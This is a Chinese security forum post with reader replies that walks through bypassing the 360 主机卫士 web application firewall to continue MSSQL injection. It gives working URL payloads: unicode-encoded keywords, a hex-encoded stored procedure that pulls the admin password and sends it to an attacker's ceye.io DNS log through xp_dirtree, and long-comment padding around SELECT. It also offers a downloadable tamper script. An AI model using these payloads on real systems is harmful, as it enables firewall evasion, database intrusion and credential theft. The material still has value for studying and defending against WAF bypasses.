用户
搜索
  • TA的每日心情
    慵懒
    2017-9-6 12:27
  • 签到天数: 4 天

    连续签到: 1 天

    [LV.2]偶尔看看

    版主

    Rank: 7Rank: 7Rank: 7

    71

    主题

    397

    帖子

    1737

    魔法币
    收听
    0
    粉丝
    11
    注册时间
    2016-4-6

    楚突出贡献限定版春秋段子手i春秋签约作者

    发表于 2017-8-3 18:33:24 175926
    本帖最后由 添潮 于 2017-8-4 13:59 编辑

    使用hex编码绕过主机卫士IIS版本继续注入
    作者:非主流
    测试文件的源码如下:
    1.png

    我们先直接加上单引号试试:http://192.168.0.20/conn.asp?id=1%27
    2.png


    很好,没有报错。那我们继续,and 1=1和and 1=2,被拦截了。这个时候,我们可以看看到底是什么规则,发现每一个单独提交都不被拦截,组合到一起便被拦截了,好,那我们变通一下,用+代替空格
    3.png
    不再被拦截,Gogogo
    4.png
    http://192.168.0.20/conn.asp?id=1+and+1=user  查看当前连接数据库的用户
    5.png
    6.png
    但是,当我们想查看有多少数据库的时候,发现被拦截了。怎么办?绕!
    7.png
    http://192.168.0.20/conn.asp?id=1+and+(SELECT+top+1+Name+FROM+Master..SysDatabases)
    但是怎么绕呢。。依次测试吧,从左至右,开始依次加sql注入的关键字,发现
    8.png
    下表仅显示被拦截项目
    关键字
    and
    select
    top
    name
    from
    master
    .
    (
    )
    and

    X







    select




    X




    Top









    Name









    from









    master









    .









    (









    )









    可以看出,两个关键字的时候,只拦截select,那么我们试试三个关键字(select)的时候,主机卫士会拦截什么?发现什么都不拦截,只会报语法错误。。。
    由此,我们得出一个结论,主机卫士一定会拦截select关键字,那么问题来了,他只拦截select吗?SeLeCt呢?经过不完全测试,发现当我们将select字符unicode编码后,不拦截
    9.png
    但是,当我们尝试一次添加三个关键字的时候,主机卫士又拦截了(好累)http://192.168.0.20/conn.asp?id=1+and+(%u0073%u0065%u006c%u0065%u0063%u0074+top
    10.png
    那么我们来试试存储过程呢?
    Mssql的存储过程定义如下:
    Declare @S varchar(5000)  //申明变量@s 类型为varchar(5000)
    Set @  //@s变量赋值
    Exec(@s) //执行@s
    那么,我们就需要试着在url中提交declaresetexec,看看是否被拦截。
    11.png
    很好,没有被拦截,只是提示语法错误,那就证明我们可以利用存储过程去绕过主机卫士!
    我写了一个存储过程,内容如下(红色字体是需要另外修改的)
    declare @s varchar(5000),@host varchar(5000)
    set @s=(select password from waf_test.dbo.admin where username='admin')
    set@host=CONVERT(varchar(5000),@s)+'.xxxx.ceye.io';EXEC('master..xp_dirtre
    e"\\'+@host+'\foobar$"')
    我将这个存储过程转化成16进制(hex)
    0x6465636c61726520407320766172636861722835303030292c40686f73742076617263686172283530303029207365742040733d2873656c6563742070617373776f72642066726f6d207761665f746573742e64626f2e61646d696e20776865726520757365726e616d653d2761646d696e2729207365742040686f73743d434f4e5645525428766172636861722835303030292c4073292b272e787878782e636579652e696f273b4558454328276d61737465722e2e78705f6469727472656520225c5c272b40686f73742b275c666f6f62617224222729
    所以最终我们的请求是:http://192.168.0.124/conn.aspid=1;declare+@h+varchar(5000)+set+@h=0x6465636c61726520407320766172636861722835303030292c40686f73742076617263686172283530303029207365742040733d2873656c6563742070617373776f72642066726f6d207761665f746573742e64626f2e61646d696e20776865726520757365726e616d653d2761646d696e2729207365742040686f73743d434f4e5645525428766172636861722835303030292c4073292b272e787878782e636579652e696f273b4558454328276d61737465722e2e78705f6469727472656520225c5c272b40686f73742b275c666f6f62617224222729+exec(@h)
    登陆dnslog,可以看到接收到了123456的子域名请求,这里的123456便是我在mssql数据库中admin账户的密码。
    12.png
    当然有了方法一就自然会有方法二,不妨开一下我们的脑洞。既然主机卫士我们可以利用超长的文件名去绕过上传(类似于二进制的溢出),那我们在这里是不是也可以通过提交超长的url去绕过他的get检查呢?想到就去做。
    实验过程:
    Mssql有注释语句,无论多长都不会影响到语句的执行,那么,我们试试
    select前面添加一个注释,内容非常多的1
    13.png
    咦,这是什么鬼???
    会不会是主机卫士找到关键字后,在一定的位数之内找其他关键字,如果有便返回999,如果没有就继续执行呢?那我试试用注释把select孤立起来。
    14.png
    发现bypass,很开心哦。
    tamper,各位注意查收!
    zhuji_mssql.zip (575 Bytes, 下载次数: 62)

    评分

    参与人数 2魔法币 +150 收起 理由
    sn0w + 50 感谢发布原创作品,i春秋论坛因你更精彩!.
    诚殷网络论坛 + 100 对待这样的免费分享,我诚殷大赞!希望大佬.

    查看全部评分

    本帖被以下淘专辑推荐:

    阿甫哥哥 管理员 i春秋最帅男神-阿甫大哥哥 楚 核心白帽 i春秋签约作者 白帽传说 春秋游侠 秦 燕 魏
    来自 17#
    发表于 2017-8-17 22:24:58
    文章奖励介绍及评分标准:http://bbs.ichunqiu.com/thread-7869-1-1.html,如有疑问请加QQ:286894635!
    奖金
    点评
    100
    过程清晰,实用性强,不错


    Time will give me the answer
    使用道具 举报 回复
    非主流 发表于 2017-8-3 20:26
    哇,这你都找得到,可这还是我写的呀。

    我知道这作者肯定是同一个人,但是4月我就在几个地方看到过的了,现在8月又翻出来了,对于这种风格,好文章肯定是被人说称赞的,此文也是,我等读者还是期待楼主出更多的好文章,才能在海中捞一些虾尝尝。
    使用道具 举报 回复
    w_uai 发表于 2017-8-3 21:34
    我知道这作者肯定是同一个人,但是4月我就在几个地方看到过的了,现在8月又翻出来了,对于这种风格,好文 ...

    我四月份发现的时候,没发别的地方啊。杂术馆也只知道方法一,至于方法二也只有一个人知道啊
    使用道具 举报 回复
    非主流 发表于 2017-8-4 09:17
    我四月份发现的时候,没发别的地方啊。杂术馆也只知道方法一,至于方法二也只有一个人知道啊 ...

    好吧,抱歉,没注意看,看到dns那张图都一样就以为是同一篇文章,尽然又出方法二了。666
    使用道具 举报 回复
    w_uai 发表于 2017-8-4 10:03
    好吧,抱歉,没注意看,看到dns那张图都一样就以为是同一篇文章,尽然又出方法二了。666 ...

    第二个方法很厉害的,那个时候我测试的时候是能秒某动物,不知道现在有没有更新了。
    使用道具 举报 回复
    w_uai 发表于 2017-8-3 20:22
    501发tamper吧!
    https://mp.weixin.qq.com/s?__biz=MzI2NzU2MjMxOA==&mid=2247483728&idx=1&sn=c184e71f6f ...

    哇,这你都找得到,可这还是我写的呀。
    使用道具 举报 回复
    发表于 2017-8-20 18:02:44
    阿甫哥哥 发表于 2017-8-17 22:24
    文章奖励介绍及评分标准:http://bbs.ichunqiu.com/thread-7869-1-1.html,如有疑问请加QQ:286894635!

    ...

    要给我钱了?
    使用道具 举报 回复
    很好的文章。排版辛苦了
    使用道具 举报 回复
    发表于 2017-8-3 19:51:29
    使用道具 举报 回复
    发表于 2017-8-3 20:22:26
    使用道具 举报 回复
    感谢楼主分享
    使用道具 举报 回复
    小爱_Joker 版主 成大事者 不拘小节 楚 积极活跃奖 i春秋签约作者 爱心勋章
    7#
    发表于 2017-8-4 04:22:13
    感谢分享 收藏了。
    使用道具 举报 回复
    发表于 2017-8-4 09:03:00
    学习了
    静静的看你们装逼
    使用道具 举报 回复
    发表于 2017-8-4 21:29:25
    厉害了,感谢分享
    使用道具 举报 回复
    发表于 2017-8-6 03:12:05
    66666666666又学到新知识啦
    提莫队长正在待命
    使用道具 举报 回复
    发表于 2017-8-7 01:31:02
    很好的过360主机卫士的一种方法,谢谢分享了
    使用道具 举报 回复
    12下一页
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册